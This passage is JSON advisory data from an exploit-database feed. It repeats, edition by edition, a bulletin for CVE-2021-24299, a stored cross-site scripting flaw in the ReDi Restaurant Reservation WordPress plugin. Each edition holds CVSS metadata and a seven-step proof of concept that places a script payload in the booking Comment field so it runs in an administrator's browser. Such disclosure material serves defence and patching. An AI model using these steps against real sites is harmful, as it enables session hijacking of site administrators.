"CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-04T22:38:38", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}], "modified": "2021-09-04T22:38:38", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-04T22:38:38", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-05] #"}, "lastseen": "2021-09-04T22:38:38", "differentElements": ["sourceData"], "edition": 6}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "6ac6dcde94f7a31955eef2a7c0471217", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-05T22:20:32", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-09-05T22:20:32", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-05T22:20:32", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-06] #"}, "lastseen": "2021-09-05T22:20:32", "differentElements": ["sourceData"], "edition": 7}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "25e9549d4cb683b6dbe5967e3ace192b", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-07T06:44:48", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}], "modified": "2021-09-07T06:44:48", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-07T06:44:48", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-07] #"}, "lastseen": "2021-09-07T06:44:48", "differentElements": ["sourceData"], "edition": 8}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "63885e1e61c89ec96a6a6486d864444a", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-07T22:35:00", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}], "modified": "2021-09-07T22:35:00", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-07T22:35:00", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-08] #"}, "lastseen": "2021-09-07T22:35:00", "differentElements": ["sourceData"], "edition": 9}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "84ed8226807e4e8b59ad8da10303dcf8", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-08T22:19:17", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}], "modified": "2021-09-08T22:19:17", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-08T22:19:17", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-09] #"}, "lastseen": "2021-09-08T22:19:17", "differentElements": ["sourceData"], "edition": 10}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "858537170ac547e34cf73f7b65f8a566", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-09T22:24:09", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}], "modified": "2021-09-09T22:24:09", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-09T22:24:09", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-10] #"}, "lastseen": "2021-09-09T22:24:09", "differentElements": ["sourceData"], "edition": 11}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "e6a2bba6ba2efbd37f8ae65e8dc03427", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-10T22:21:31", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}], "modified": "2021-09-09T22:24:09", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-09T22:24:09", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-11] #"}, "lastseen": "2021-09-10T22:21:31", "differentElements": ["sourceData"], "edition": 12}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "7408413928a5209670973052a653bee4", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-11T22:44:06", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-09-11T22:44:06", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-11T22:44:06", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-12] #"}, "lastseen": "2021-09-11T22:44:06", "differentElements": ["sourceData"], "edition": 13}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "b10c12b48d0e6ca7b7c2af32d4dff61a", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 21.0307 Plugin - (Comment) Stored Cross-Site Scripting", "description": "", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://0day.today/exploit/description/36289", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-09-12T22:24:03", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "threatpost", "idList": ["THREATPOST:7C8F5D2495C8D268805D08DB5A40072F"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "wpexploit", "idList": ["WPEX-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": "exploitdb", "idList": ["EDB-ID:49903"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162756"]}], "modified": "2021-09-11T22:44:06", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2021-09-11T22:44:06", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36289", "sourceData": "# Exploit Title: WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)\r\n# Exploit Author: Bastijn Ouwendijk\r\n# Vendor Homepage: https://reservationdiary.eu/\r\n# Software Link: https://wordpress.org/plugins/redi-restaurant-reservation/\r\n# Version: 21.0307 and earlier\r\n# Tested on: Windows 10\r\n# CVE : CVE-2021-24299\r\n# Proof: https://bastijnouwendijk.com/cve-2021-24299/\r\n\r\nSteps to exploit this vulnerability:\r\n\r\n1. Go to the page where [redirestaurant] is embed to make a restaurant reservation by filling in the requested information\r\n2. In the 'Comment' field of the restaurant reservation form put the payload: `<script>alert(\"XSS\")</script>`\r\n3. Submit the form\r\n4. While being logged into WordPress as administrator go to ReDi Reservations > Upcoming (Tablet PC)\r\n5. Click on 'View upcoming reservations'\r\n6. Select for 'Show reservations for': 'This week'\r\n7. The reservations are loaded and two alerts are shown with text 'XSS'\n\n# 0day.today [2021-09-13] #"}, "lastseen": "2021-09-12T22:24:03", "differentElements": ["sourceData"], "edition": 14}, {"bulletin": {"id": "1337DAY-ID-36289", "hash": "2eaf84c832f41fd8570725fb0aa0f965", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress ReDi Restaurant Reservation 